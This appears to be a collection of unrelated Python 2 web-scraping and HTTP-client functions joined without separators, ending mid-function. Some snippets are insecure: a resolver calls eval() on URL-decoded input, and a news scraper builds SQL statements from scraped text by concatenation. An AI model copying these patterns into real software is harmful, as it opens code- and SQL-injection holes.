from decimal import Decimal from pygaga.helpers.cachedns_urllib import custom_dns_opener from pygaga.helpers.urlutils import download, parse_html from pygaga.helpers.statsd import statsd_timing from pygaga.simplejson import loads from pygaga.helpers.utils import get_val, get_num_val from guang_crawler import comments_pb2 logger = logging.getLogger('CrawlLogger') FLAGS = gflags.FLAGS DEFAULT_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" urllib2.install_opener(custom_dns_opener()) CURPAGE_RE = re.compile("^(.*currentPage=)([^&]*?)(&.*|)$") JSON_RE = re.compile("^\s*jsonp_reviews_list\((.+)\)\s*$", re.M | re.S) TM_JSON_RE = re.compile("^\s*TB.detailRate\s*=\s*(.+)$", re.M | re.S) RATECOUNT_RE = re.compile("^.*<em>([0-9]+)</em>.*$", re.M | re.S) DESCURL_RE = re.compile("http://dsc.taobaocdn.com/i\d[^\"']+\.desc[^\"']*", re.M | re.S) IMAGESTYLE_RE = re.compile("^.*url\(([^\)]+)\)$", re.M | re.S) class TaobaoHtml: def __init__(self, item_id, num_id, is_tmall=False, max_comments=0): self.item_id = item_id self.num_id = num_id
def __init__(self, username=None, password=None, filter=None, tmp_dir='/tmp'): ContentProvider.__init__(self, 'barrandov.tv', 'http://www.barrandov.tv', username, password, filter, tmp_dir) opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) urllib2.install_opener(opener)
def read_config(config_file): global config if not os.path.isfile(config_file): exit("[!] missing configuration file '%s'" % config_file) else: print "[i] using configuration file '%s'" % config_file config.clear() try: array = None content = open(config_file, "rb").read() for line in content.split("\n"): line = line.strip('\r') line = re.sub(r"\s*#.*", "", line) if not line.strip(): continue if line.count(' ') == 0: if re.search(r"[^\w]", line): if array == "USERS": exit("[!] invalid USERS entry '%s'\n[?] (hint: add whitespace at start of line)" % line) else: exit("[!] invalid configuration (line: '%s')" % line) array = line.upper() config[array] = [] continue if array and line.startswith(' '): config[array].append(line.strip()) continue else: array = None try: name, value = line.strip().split(' ', 1) except ValueError: name = line value = "" finally: name = name.strip().upper() value = value.strip("'\"").strip() _ = os.environ.get("%s_%s" % (NAME.upper(), name)) if _: value = _ if any(name.startswith(_) for _ in ("USE_", "SET_", "CHECK_", "ENABLE_", "SHOW_", "DISABLE_")): value = value.lower() in ("1", "true") elif value.isdigit(): value = int(value) else: for match in re.finditer(r"\$([A-Z0-9_]+)", value): if match.group(1) in globals(): value = value.replace(match.group(0), str(globals()[match.group(1)])) else: value = value.replace(match.group(0), os.environ.get(match.group(1), match.group(0))) if name.endswith("_DIR"): value = os.path.realpath(os.path.join(ROOT_DIR, os.path.expanduser(value))) config[name] = value except (IOError, OSError): pass for option in ("MONITOR_INTERFACE", "CAPTURE_BUFFER", "LOG_DIR"): if not option in config: exit("[!] missing mandatory option '%s' in configuration file '%s'" % (option, config_file)) for entry in (config.USERS or []): if len(entry.split(':')) != 4: exit("[!] invalid USERS entry '%s'" % entry) if re.search(r"\$\d+\$", entry): exit("[!] invalid USERS entry '%s'\n[?] (hint: please update PBKDF2 hashes to SHA256 in your configuration file)" % entry) if config.SSL_PEM: config.SSL_PEM = config.SSL_PEM.replace('/', os.sep) if config.USER_WHITELIST: if ',' in config.USER_WHITELIST: print("[x] configuration value 'USER_WHITELIST' has been changed. Please use it to set location of whitelist file") elif not os.path.isfile(config.USER_WHITELIST): exit("[!] missing 'USER_WHITELIST' file '%s'" % config.USER_WHITELIST) else: read_whitelist() config.PROCESS_COUNT = int(config.PROCESS_COUNT or CPU_CORES) if config.USE_MULTIPROCESSING: print("[x] configuration switch 'USE_MULTIPROCESSING' is deprecated. Please use 'PROCESS_COUNT' instead") if config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER)): print("[x] configuration switch 'DISABLE_LOCAL_LOG_STORAGE' turned on and neither option 'LOG_SERVER' nor 'SYSLOG_SERVER' are set. Falling back to console output of event data") if config.UDP_ADDRESS is not None and config.UDP_PORT is None: exit("[!] usage of configuration value 'UDP_ADDRESS' requires also usage of 'UDP_PORT'") if config.UDP_ADDRESS is None and config.UDP_PORT is not None: exit("[!] usage of configuration value 'UDP_PORT' requires also usage of 'UDP_ADDRESS'") if not str(config.HTTP_PORT or "").isdigit(): exit("[!] 
invalid configuration value for 'HTTP_PORT' ('%s')" % config.HTTP_PORT) if config.PROCESS_COUNT and subprocess.mswindows: print "[x] multiprocessing is currently not supported on Windows OS" config.PROCESS_COUNT = 1 if config.CAPTURE_BUFFER: if str(config.CAPTURE_BUFFER or "").isdigit(): config.CAPTURE_BUFFER = int(config.CAPTURE_BUFFER) elif re.search(r"\d+\s*[kKmMgG]B", config.CAPTURE_BUFFER): match = re.search(r"(\d+)\s*([kKmMgG])B", config.CAPTURE_BUFFER) config.CAPTURE_BUFFER = int(match.group(1)) * {"K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}[match.group(2).upper()] elif re.search(r"\d+%", config.CAPTURE_BUFFER): physmem = _get_total_physmem() if physmem: config.CAPTURE_BUFFER = physmem * int(re.search(r"(\d+)%", config.CAPTURE_BUFFER).group(1)) / 100 else: exit("[!] unable to determine total physical memory. Please use absolute value for 'CAPTURE_BUFFER'") else: exit("[!] invalid configuration value for 'CAPTURE_BUFFER' ('%s')" % config.CAPTURE_BUFFER) config.CAPTURE_BUFFER = config.CAPTURE_BUFFER / BLOCK_LENGTH * BLOCK_LENGTH if config.PROXY_ADDRESS: PROXIES.update({"http": config.PROXY_ADDRESS, "https": config.PROXY_ADDRESS}) opener = urllib2.build_opener(urllib2.ProxyHandler(PROXIES)) urllib2.install_opener(opener)
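The CAPTURE_BUFFER handling above accepts a raw byte count, a '<n>KB/MB/GB' suffix, or a percentage of physical memory, then rounds down to a whole number of blocks. A minimal sketch of just that parsing, assuming the caller supplies total physical memory when a percentage is used (parse_buffer_size is an illustrative name):

import re

def parse_buffer_size(value, total_physmem=None, block_length=4096):
    value = str(value)
    if value.isdigit():
        # plain integer: already a byte count
        size = int(value)
    elif re.search(r"\d+\s*[kKmMgG]B", value):
        # "<n>KB" / "<n>MB" / "<n>GB" suffix
        match = re.search(r"(\d+)\s*([kKmMgG])B", value)
        size = int(match.group(1)) * {"K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}[match.group(2).upper()]
    elif re.search(r"\d+%", value) and total_physmem:
        # "<n>%" of total physical memory
        size = total_physmem * int(re.search(r"(\d+)%", value).group(1)) / 100
    else:
        raise ValueError("invalid buffer size %r" % value)
    # round down to a whole number of capture blocks, as the original does
    return size / block_length * block_length

# e.g. parse_buffer_size("64MB") == 67108864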
def read_body_and_headers(url,post=None,headers=[],follow_redirects=False,timeout=None): _log("read_body_and_headers "+url) if post is not None: _log("read_body_and_headers post="+post) if len(headers)==0: headers.append(["User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0"]) # Start cookie lib ficherocookies=os.path.join(get_data_path(),'cookies.dat'); _log("read_body_and_headers cookies_file="+ficherocookies); cj=None; ClientCookie=None; cookielib=None try: _log("read_body_and_headers importing cookielib"); import cookielib # Let's see if cookielib is available except ImportError: _log("read_body_and_headers cookielib no disponible") # If importing cookielib fails # let's try ClientCookie try: _log("read_body_and_headers importing ClientCookie"); import ClientCookie except ImportError: _log("read_body_and_headers ClientCookie not available"); urlopen=urllib2.urlopen; Request=urllib2.Request # ClientCookie isn't available either else: _log("read_body_and_headers ClientCookie available"); urlopen=ClientCookie.urlopen; Request=ClientCookie.Request; cj=ClientCookie.MozillaCookieJar() # imported ClientCookie else: _log("read_body_and_headers cookielib available"); urlopen=urllib2.urlopen; Request=urllib2.Request; cj=cookielib.MozillaCookieJar() # importing cookielib worked # This is a subclass of FileCookieJar # that has useful load and save methods if cj is not None: # we successfully imported # one of the two cookie handling modules _log("read_body_and_headers Cookies enabled") if os.path.isfile(ficherocookies): _log("read_body_and_headers Reading cookie file") try: cj.load(ficherocookies) # if we have a cookie file already saved # then load the cookies into the Cookie Jar except: _log("read_body_and_headers Wrong cookie file, deleting..."); os.remove(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: _log("read_body_and_headers opener using urllib2 (cookielib)") # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 if not follow_redirects: opener=urllib2.build_opener(urllib2.HTTPHandler(debuglevel=http_debug_log_enabled),urllib2.HTTPCookieProcessor(cj),NoRedirectHandler()) else: opener=urllib2.build_opener(urllib2.HTTPHandler(debuglevel=http_debug_log_enabled),urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: _log("read_body_and_headers opener using ClientCookie") # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener=ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)); ClientCookie.install_opener(opener) # ------------------------------------------------- # Cookies instaladas, lanza la petición # ------------------------------------------------- inicio=time.clock() # Contador txheaders={} # Diccionario para las cabeceras if post is None: _log("read_body_and_headers GET request") # Construye el request else: _log("read_body_and_headers POST request") _log("read_body_and_headers ---------------------------") # Añade las cabeceras for header in headers: _log("read_body_and_headers header %s=%s" % (str(header[0]),str(header[1]))); txheaders[header[0]]=header[1] _log("read_body_and_headers ---------------------------"); req=Request(url,post,txheaders) if timeout is None: handle=urlopen(req) else: #Disponible en python 2.6 en adelante --> handle = urlopen(req, timeout=timeout) #Para todas las versiones: try: import socket; 
deftimeout=socket.getdefaulttimeout(); socket.setdefaulttimeout(timeout); handle=urlopen(req); socket.setdefaulttimeout(deftimeout) except: import sys for line in sys.exc_info(): _log( "%s" % line ) cj.save(ficherocookies) # Update the cookie store # Read the data and close if handle.info().get('Content-Encoding')=='gzip': buf=StringIO(handle.read()); f=gzip.GzipFile(fileobj=buf); data=f.read() else: data=handle.read() info=handle.info(); _log("read_body_and_headers Response"); returnheaders=[]; _log("read_body_and_headers ---------------------------") for header in info: _log("read_body_and_headers "+header+"="+info[header]); returnheaders.append([header,info[header]]) handle.close(); _log("read_body_and_headers ---------------------------") ''' # Send the request try: response = urllib2.urlopen(req) # If it fails, retry with special characters escaped except: req = urllib2.Request(url.replace(" ","%20")) # Add the headers for header in headers: req.add_header(header[0],header[1]) response = urllib2.urlopen(req) ''' # Elapsed time fin=time.clock(); _log("read_body_and_headers Downloaded in %d seconds " % (fin-inicio+1)); _log("read_body_and_headers body="+data); return data,returnheaders
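Because urlopen() only accepts a timeout argument from Python 2.6 onwards, the code above falls back to temporarily swapping the process-wide socket default. A minimal sketch of that fallback with a try/finally so the old default is always restored (urlopen_with_timeout is an illustrative name):

import socket
import urllib2

def urlopen_with_timeout(req, timeout):
    # pre-2.6 workaround: set the global default socket timeout,
    # perform the request, then restore the previous value
    old_timeout = socket.getdefaulttimeout()
    socket.setdefaulttimeout(timeout)
    try:
        return urllib2.urlopen(req)
    finally:
        socket.setdefaulttimeout(old_timeout)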
def query(action=None, command=None, args=None, method='GET', data=None): ''' Make a web call to a Parallels provider ''' path = config.get_cloud_config_value('url', get_configured_provider(), __opts__, search_global=False) auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password( realm='Parallels Instance Manager', uri=path, user=config.get_cloud_config_value('user', get_configured_provider(), __opts__, search_global=False), passwd=config.get_cloud_config_value('password', get_configured_provider(), __opts__, search_global=False)) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) if action: path += action if command: path += '/{0}'.format(command) if not isinstance(args, dict): args = {} kwargs = {'data': data} if isinstance(data, str) and '<?xml' in data: kwargs['headers'] = { 'Content-type': 'application/xml', } if args: params = urllib.urlencode(args) req = urllib2.Request(url='{0}?{1}'.format(path, params), **kwargs) else: req = urllib2.Request(url=path, **kwargs) req.get_method = lambda: method log.debug('{0} {1}'.format(method, req.get_full_url())) if data: log.debug(data) try: result = urllib2.urlopen(req) log.debug('PARALLELS Response Status Code: {0}'.format( result.getcode())) if 'content-length' in result.headers: content = result.read() result.close() items = ET.fromstring(content) return items return {} except urllib2.URLError as exc: log.error('PARALLELS Response Status Code: {0} {1}'.format( exc.code, exc.msg)) root = ET.fromstring(exc.read()) log.error(root) return {'error': root}
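Two details of query() above are worth isolating: registering Basic-Auth credentials for a named realm up front, and forcing a non-GET verb on a urllib2.Request by overriding get_method. A short sketch under the assumption of placeholder credentials and URL (authed_request is an illustrative name):

import urllib2

def authed_request(url, method='PUT', realm='Parallels Instance Manager',
                   user='admin', passwd='secret'):
    auth_handler = urllib2.HTTPBasicAuthHandler()
    # credentials are sent once the server challenges for this realm/URI
    auth_handler.add_password(realm=realm, uri=url, user=user, passwd=passwd)
    urllib2.install_opener(urllib2.build_opener(auth_handler))

    req = urllib2.Request(url=url)
    # urllib2.Request has no verb parameter; overriding get_method is the usual workaround
    req.get_method = lambda: method
    return urllib2.urlopen(req)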
def getRegexParsed(regexs, url, cookieJar=None, forCookieJarOnly=False, recursiveCall=False, cachedPages={}, rawPost=False): #0,1,2 = URL, regexOnly, CookieJarOnly if not recursiveCall: regexs = eval(urllib.unquote(regexs)) #cachedPages = {} print 'url', url doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url) print 'doRegexs', doRegexs, regexs for k in doRegexs: if k in regexs: print 'processing ', k m = regexs[k] print m cookieJarParam = False if 'cookiejar' in m: # so either create or reuse existing jar #print 'cookiejar exists',m['cookiejar'] cookieJarParam = m['cookiejar'] if '$doregex' in cookieJarParam: cookieJar = getRegexParsed(regexs, m['cookiejar'], cookieJar, True, True, cachedPages) cookieJarParam = True else: cookieJarParam = True if cookieJarParam: if cookieJar == None: print 'create cookie jar' import cookielib cookieJar = cookielib.LWPCookieJar() #print 'cookieJar new',cookieJar if '$doregex' in m['page']: m['page'] = getRegexParsed(regexs, m['page'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if 'post' in m and '$doregex' in m['post']: m['post'] = getRegexParsed(regexs, m['post'], cookieJar, recursiveCall=True, cachedPages=cachedPages) print 'post is now', m['post'] if 'rawpost' in m and '$doregex' in m['rawpost']: m['rawpost'] = getRegexParsed(regexs, m['rawpost'], cookieJar, recursiveCall=True, cachedPages=cachedPages, rawPost=True) print 'rawpost is now', m['rawpost'] if m['page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly == False: link = cachedPages[m['page']] else: #print 'Ingoring Cache',m['page'] req = urllib2.Request(m['page']) print 'req', m['page'] req.add_header( 'User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1' ) if 'refer' in m: req.add_header('Referer', m['refer']) if 'agent' in m: req.add_header('User-agent', m['agent']) if 'setcookie' in m: print 'adding cookie', m['setcookie'] req.add_header('Cookie', m['setcookie']) if not cookieJar == None: #print 'cookieJarVal',cookieJar cookie_handler = urllib2.HTTPCookieProcessor(cookieJar) opener = urllib2.build_opener( cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) #print 'after cookie jar' post = None if 'post' in m: postData = m['post'] if '$LiveStreamRecaptcha' in postData: (captcha_challenge, catpcha_word) = processRecaptcha(m['page']) if captcha_challenge: postData += 'recaptcha_challenge_field:' + captcha_challenge + ',recaptcha_response_field:' + catpcha_word splitpost = postData.split(',') post = {} for p in splitpost: n = p.split(':')[0] v = p.split(':')[1] post[n] = v post = urllib.urlencode(post) if 'rawpost' in m: post = m['rawpost'] if '$LiveStreamRecaptcha' in post: (captcha_challenge, catpcha_word) = processRecaptcha(m['page']) if captcha_challenge: post += '&recaptcha_challenge_field=' + captcha_challenge + '&recaptcha_response_field=' + catpcha_word if post: response = urllib2.urlopen(req, post) else: response = urllib2.urlopen(req) link = response.read() link = javascriptUnEscape(link) response.close() cachedPages[m['page']] = link #print link print 'store link for', m['page'], forCookieJarOnly if forCookieJarOnly: return cookieJar # do nothing if '$doregex' in m['expre']: m['expre'] = getRegexParsed(regexs, m['expre'], cookieJar, recursiveCall=True, cachedPages=cachedPages) print 'exp k and url' print m['expre'], k, url print 'aa' if not m['expre'] == '': print 'doing it ', m['expre'] if not '$LiveStreamCaptcha' in m['expre']: reg = 
re.compile(m['expre']).search(link) val = reg.group(1).strip() if rawPost: print 'rawpost' val = urllib.quote_plus(val) if 'htmlunescape' in m: #val=urllib.unquote_plus(val) import HTMLParser val = HTMLParser.HTMLParser().unescape(val) url = url.replace("$doregex[" + k + "]", val) else: val = askCaptcha(m, link, cookieJar) print 'url and val', url, val url = url.replace("$doregex[" + k + "]", val) #return val else: url = url.replace("$doregex[" + k + "]", '') if '$epoctime$' in url: url = url.replace('$epoctime$', getEpocTime()) if recursiveCall: return url print 'final url', url item = xbmcgui.ListItem(path=url) #setResolvedUrl #xbmc.playlist(xbmc.playlist_video).clear() #xbmc.playlist(xbmc.playlist_video).add(url) #xbmc.Player().play(item=url) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
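At its core, getRegexParsed() performs template substitution: each $doregex[name] token in the URL is replaced by group(1) of the named regex applied to a freshly fetched page. A heavily simplified sketch of that loop, without cookies, captchas, caching or recursion (resolve_tokens is an illustrative name):

import re
import urllib2

def resolve_tokens(url, regexs):
    # regexs maps a name to {'page': <url to fetch>, 'expre': <pattern with one capture group>}
    for name in re.compile(r'\$doregex\[([^\]]*)\]').findall(url):
        if name not in regexs:
            continue
        m = regexs[name]
        req = urllib2.Request(m['page'])
        req.add_header('User-Agent', 'Mozilla/5.0')
        page = urllib2.urlopen(req).read()
        match = re.compile(m['expre']).search(page)
        value = match.group(1).strip() if match else ''
        url = url.replace('$doregex[' + name + ']', value)
    return url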
def fetchMiaopaiData(): lastid = None dr = re.compile(r'<[^>]+>', re.S) uname = '/app/yxtk/script/useragent.txt' f1 = open("/app/yxtk/script/data/1905movienews.sql", 'w', buffering=-1) with open(uname) as f: useragents = f.readlines() userAgent = random.choice(useragents) headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Cache-Control': 'max-age=0', 'Accept-Encoding': 'gzip, deflate, sdch', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Cache-Control': 'max-age=0', 'Connection': 'keep-alive', 'Cookie': '__uv_=6606525396; SpMLdaPxuv=m4127234796; CNZZDATA1253604207=1123659875-1462410988-null%7C1462410988; C_P_i=1; GED_PLAYLIST_ACTIVITY=W3sidSI6IkxxMnIiLCJ0IjoxNDYyNDE1MjExLCJlZCI6eyJqIjp7IkEiOnsidHQiOjkzLCJwZCI6OTMsImJzIjoxMCwiZXMiOjB9fSwiZiI6MTQ2MjQxNTIxMSwiYSI6W3sia3YiOnsiYyI6MSwibSI6NzEwfX0seyJrdiI6eyJjIjo2LCJzIjoyNCwibSI6NTE5fX0seyJrdiI6eyJtIjoxMzk2LCJzIjoxNCwiYyI6M319LHsia3YiOnsibSI6MjU0OCwiYyI6MX19LHsia3YiOnsicyI6MiwibSI6MjY3fX0seyJrdiI6eyJjIjo0LCJtIjozODY4LCJzIjo2fX1dfSwibnYiOjEsInBsIjo5MywibHQiOjE0NjI0MTUyMTF9XQ..; WOlTvIlgRpuvid_=1138; pvid=1462419488231; bfd_s=68774865.12702418.1462415058975; tmc=2.68774865.79541045.1462419484753.1462419484753.1462419488287; tma=68774865.23748224.1462415058979.1462415058979.1462415058979.1; tmd=15.68774865.23748224.1462415058979.; Hm_lvt_49411f7bde52035653f2e2b70a0bb6a5=1462415059; Hm_lpvt_49411f7bde52035653f2e2b70a0bb6a5=1462419488; Hm_lvt_5a9573957327e40b58294447cd1d8ad2=1462415059; Hm_lpvt_5a9573957327e40b58294447cd1d8ad2=1462419488; bfd_g=9de2782bcb754fd700004f6702618c9d556e9317; Hm_lvt_bfe9961e25bf081711e59b3f78be82d4=1462415059; Hm_lpvt_bfe9961e25bf081711e59b3f78be82d4=1462419488; WOlTvIlgRptime_=1462419488231', 'Host': 'www.1905.com', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36' } while True: for j in range(1, 3): time.sleep(1) pageNo = 0 if j == 1: url = 'http://www.1905.com/list-p-catid-220.html' if j == 2: url = 'http://www.1905.com/film/#fixedLeftMod' print url try: encoding_support = ContentEncodingProcessor opener = urllib2.build_opener(encoding_support) opener.addheaders = [('User-agent', userAgent[:-2]), ('Accept-Encoding', "gzip, deflate")] urllib2.install_opener(opener) req = urllib2.urlopen(url.strip(), timeout=5) html = req.read() req.close() if html.find("<!DOCTYPE") == -1: html = "<!DOCTYPE html><base href=http://learning.sohu.com><script type='text/javascript'>var pvinsight_page_ancestors = '200312880;401049313';</script><html><head><meta http-equiv='content-type' content='text/html; charset=utf-8' /></head><body>" + html + "</body></html>" try: html = html.replace( '<meta charset="utf-8">', '<meta http-equiv="content-type" content="text/html; charset=utf-8" /' ) except Exception as e: print e doc = pq(html) lis = doc('li.pic-pack-out') for li in lis.items(): movie_url = li('a.pic-url').attr('href') m = re.findall(r'(\w*[0-9]+)\w*', str(movie_url)) if len(m) == 3: movie_id = str(m[2]) else: movie_id = '0000' if li('a.pic-url').children('img').attr('src') is None: movie_pic = " " movie_id = '0000' else: movie_pic = li('a.pic-url').children('img').attr('src') movie_title = "\" " + li('a.title').html().encode( 'utf8') + " \"" movie_title = movie_title.replace("\n", '') movie_title = movie_title.replace(",", ',') movie_date = li('span.timer').html() imageUrl = qiniuUpdate(movie_pic.strip()) req = urllib2.Request(movie_url) res = urllib2.urlopen(req) html1 = unicode(res.read(), 
'utf-8') html1 = re.sub(r'<script>(.*?)</script>', '', html1) res.close() doc1 = pq(html1) con = doc1('div.pic-content') con('img').removeAttr("style") con('img').removeAttr("width") con('img').removeAttr("height") con('img').attr("style", "width:100%") p = con('div.pic-content').html() if p is None or p == '': continue p = re.sub(r' ', '', p) p = re.sub(r'<style.*>([\S\s\t]*?)</style>', '', p) p = re.sub(r'<script.*>([\S\s\t]*?)</script>', '', p) p = re.sub(r'<p[^>]*>', '<p>', p) p = re.sub(r'<(?!img|br|p|/p).*?>', '', p) p = re.sub(r'\r', '', p) p = re.sub(r'\n', '', p) p = re.sub(r'\s', '', p) p = re.sub(r'src=', ' src=', p) #newqiniu = pq(p) #imgs = newqiniu('img') #for image in imgs.items(): #imgurl = image('img').attr('src') #newimgurl = qiniuUpdate(imgurl.strip()) #p = p.replace(str(imgurl),str(newimgurl)) sql = "INSERT INTO 3rd_tencent_news(id,creator,modifier,create_time,modify_time,is_deleted,title,time,img_url,thumbnail_url,source,content,push_flag,recommend_flag,view_status) VALUES(NULL,'sys','sys',now(),now(),'n'," + movie_title.strip( ) + ",now(),'" + imageUrl + "','" + imageUrl + "','1905电影网','" + p.strip( ) + "',0,NULL,0);" + '\n' print sql f1.writelines(sql) file_name = urllib2.unquote( movie_pic.strip()).decode('utf8').split('/')[-1] os.remove('/app/yxtk/script/' + file_name) except Exception as e: print e break f1.close()
def getRegexParsed( regexs, url, cookieJar=None, forCookieJarOnly=False, recursiveCall=False, cachedPages={}, rawPost=False, cookie_jar_file=None): #0,1,2 = URL, regexOnly, CookieJarOnly #cachedPages = {} #print 'url',url doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url) # print 'doRegexs',doRegexs,regexs setresolved = True for k in doRegexs: if k in regexs: #print 'processing ' ,k m = regexs[k] #print m cookieJarParam = False if 'cookiejar' in m: # so either create or reuse existing jar #print 'cookiejar exists',m['cookiejar'] cookieJarParam = m['cookiejar'] if '$doregex' in cookieJarParam: cookieJar = getRegexParsed(regexs, m['cookiejar'], cookieJar, True, True, cachedPages) cookieJarParam = True else: cookieJarParam = True #print 'm[cookiejar]',m['cookiejar'],cookieJar if cookieJarParam: if cookieJar == None: #print 'create cookie jar' cookie_jar_file = None if 'open[' in m['cookiejar']: cookie_jar_file = m['cookiejar'].split( 'open[')[1].split(']')[0] # print 'cookieJar from file name',cookie_jar_file cookieJar = getCookieJar(cookie_jar_file) # print 'cookieJar from file',cookieJar if cookie_jar_file: saveCookieJar(cookieJar, cookie_jar_file) #import cookielib #cookieJar = cookielib.LWPCookieJar() #print 'cookieJar new',cookieJar elif 'save[' in m['cookiejar']: cookie_jar_file = m['cookiejar'].split('save[')[1].split( ']')[0] complete_path = os.path.join(profile, cookie_jar_file) # print 'complete_path',complete_path saveCookieJar(cookieJar, cookie_jar_file) if m['page'] and '$doregex' in m['page']: pg = getRegexParsed(regexs, m['page'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if len(pg) == 0: pg = 'http://regexfailed' m['page'] = pg if 'setcookie' in m and m['setcookie'] and '$doregex' in m[ 'setcookie']: m['setcookie'] = getRegexParsed(regexs, m['setcookie'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if 'appendcookie' in m and m['appendcookie'] and '$doregex' in m[ 'appendcookie']: m['appendcookie'] = getRegexParsed(regexs, m['appendcookie'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if 'post' in m and '$doregex' in m['post']: m['post'] = getRegexParsed(regexs, m['post'], cookieJar, recursiveCall=True, cachedPages=cachedPages) # print 'post is now',m['post'] if 'rawpost' in m and '$doregex' in m['rawpost']: m['rawpost'] = getRegexParsed(regexs, m['rawpost'], cookieJar, recursiveCall=True, cachedPages=cachedPages, rawPost=True) #print 'rawpost is now',m['rawpost'] if 'rawpost' in m and '$epoctime$' in m['rawpost']: m['rawpost'] = m['rawpost'].replace('$epoctime$', getEpocTime()) if 'rawpost' in m and '$epoctime2$' in m['rawpost']: m['rawpost'] = m['rawpost'].replace('$epoctime2$', getEpocTime2()) link = '' if m['page'] and m[ 'page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly == False: #print 'using cache page',m['page'] link = cachedPages[m['page']] else: if m['page'] and not m['page'] == '' and m['page'].startswith( 'http'): if '$epoctime$' in m['page']: m['page'] = m['page'].replace('$epoctime$', getEpocTime()) if '$epoctime2$' in m['page']: m['page'] = m['page'].replace('$epoctime2$', getEpocTime2()) #print 'Ingoring Cache',m['page'] page_split = m['page'].split('|') pageUrl = page_split[0] header_in_page = None if len(page_split) > 1: header_in_page = page_split[1] # if # proxy = urllib2.ProxyHandler({ ('https' ? 
proxytouse[:5]=="https":"http") : proxytouse}) # opener = urllib2.build_opener(proxy) # urllib2.install_opener(opener) # import urllib2 # print 'urllib2.getproxies',urllib2.getproxies() current_proxies = urllib2.ProxyHandler( urllib2.getproxies()) #print 'getting pageUrl',pageUrl req = urllib2.Request(pageUrl) if 'proxy' in m: proxytouse = m['proxy'] # print 'proxytouse',proxytouse # urllib2.getproxies= lambda: {} if pageUrl[:5] == "https": proxy = urllib2.ProxyHandler({'https': proxytouse}) #req.set_proxy(proxytouse, 'https') else: proxy = urllib2.ProxyHandler({'http': proxytouse}) #req.set_proxy(proxytouse, 'http') opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) req.add_header( 'User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1' ) proxytouse = None if 'referer' in m: req.add_header('Referer', m['referer']) if 'accept' in m: req.add_header('Accept', m['accept']) if 'agent' in m: req.add_header('User-agent', m['agent']) if 'x-req' in m: req.add_header('X-Requested-With', m['x-req']) if 'x-addr' in m: req.add_header('x-addr', m['x-addr']) if 'x-forward' in m: req.add_header('X-Forwarded-For', m['x-forward']) if 'setcookie' in m: # print 'adding cookie',m['setcookie'] req.add_header('Cookie', m['setcookie']) if 'appendcookie' in m: # print 'appending cookie to cookiejar',m['appendcookie'] cookiestoApend = m['appendcookie'] cookiestoApend = cookiestoApend.split(';') for h in cookiestoApend: n, v = h.split('=') w, n = n.split(':') ck = cookielib.Cookie(version=0, name=n, value=v, port=None, port_specified=False, domain=w, domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={'HttpOnly': None}, rfc2109=False) cookieJar.set_cookie(ck) if 'origin' in m: req.add_header('Origin', m['origin']) if header_in_page: header_in_page = header_in_page.split('&') for h in header_in_page: n, v = h.split('=') req.add_header(n, v) if not cookieJar == None: # print 'cookieJarVal',cookieJar cookie_handler = urllib2.HTTPCookieProcessor(cookieJar) opener = urllib2.build_opener( cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) # print 'noredirect','noredirect' in m if 'noredirect' in m: opener = urllib2.build_opener( cookie_handler, NoRedirection, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) elif 'noredirect' in m: opener = urllib2.build_opener( NoRedirection, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) if 'connection' in m: # print '..........................connection//////.',m['connection'] from keepalive import HTTPHandler keepalive_handler = HTTPHandler() opener = urllib2.build_opener(keepalive_handler) urllib2.install_opener(opener) #print 'after cookie jar' post = None if 'post' in m: postData = m['post'] #if '$LiveStreamRecaptcha' in postData: # (captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar) # if captcha_challenge: # postData=postData.replace('$LiveStreamRecaptcha','manual_recaptcha_challenge_field:'+captcha_challenge+',recaptcha_response_field:'+catpcha_word+',id:'+idfield) splitpost = postData.split(',') post = {} for p in splitpost: n = p.split(':')[0] v = p.split(':')[1] post[n] = v post = urllib.urlencode(post) if 'rawpost' in m: post = m['rawpost'] #if '$LiveStreamRecaptcha' in post: # 
